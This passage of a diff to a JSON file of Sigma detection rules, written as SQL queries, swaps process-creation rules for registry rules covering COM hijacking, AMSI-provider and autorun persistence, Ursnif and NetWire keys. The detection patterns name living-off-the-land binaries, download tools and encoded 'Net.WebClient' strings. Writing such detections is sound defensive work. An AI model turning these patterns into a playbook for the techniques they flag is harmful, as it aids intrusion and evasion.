ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential COM Object Hijacking Via TreatAs Subkey - Registry", + "id": "9b0f8a61-91b2-464f-aceb-0527e0a45020", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects COM object hijacking via TreatAs subkey", + "author": "Kutepov Anton, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%HKU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Classes\\\\CLSID\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\TreatAs%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')))" + ], + "filename": "registry_add_persistence_com_key_linking.yml" + }, + { + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", + "tags": [ + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "Potential Persistence Via Disk Cleanup Handler - Registry", + "id": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.persistence" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate new entry added by windows" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\Active Setup Temp Folders' ESCAPE '\\' OR TargetObject LIKE '%\\\\BranchCache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Content Indexer Cleaner' ESCAPE '\\' OR TargetObject LIKE '%\\\\D3D Shader Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Delivery Optimization Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Device Driver Packages' ESCAPE '\\' OR TargetObject LIKE '%\\\\Diagnostic Data Viewer database files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Downloaded Program Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\DownloadsFolder' ESCAPE '\\' OR TargetObject LIKE '%\\\\Feedback Hub Archive log files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Internet Cache Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Language Pack' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft Office Temp Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Offline Pages Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Old ChkDsk Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Previous Installations' ESCAPE '\\' OR TargetObject LIKE '%\\\\Recycle Bin' ESCAPE '\\' OR TargetObject LIKE '%\\\\RetailDemo Offline Content' ESCAPE '\\' OR TargetObject LIKE '%\\\\Setup Log Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error memory dump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\System error minidump files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Setup Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Temporary Sync Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Thumbnail Cache' ESCAPE '\\' OR TargetObject LIKE '%\\\\Update Cleanup' ESCAPE '\\' OR TargetObject LIKE '%\\\\Upgrade Discarded Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\User file versions' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Defender' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Error Reporting Files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows ESD installation files' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows Upgrade Log Files' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_persistence_disk_cleanup_handler_entry.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", + "id": "480421f9-417f-4d3b-9552-fd2728443ec8", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' 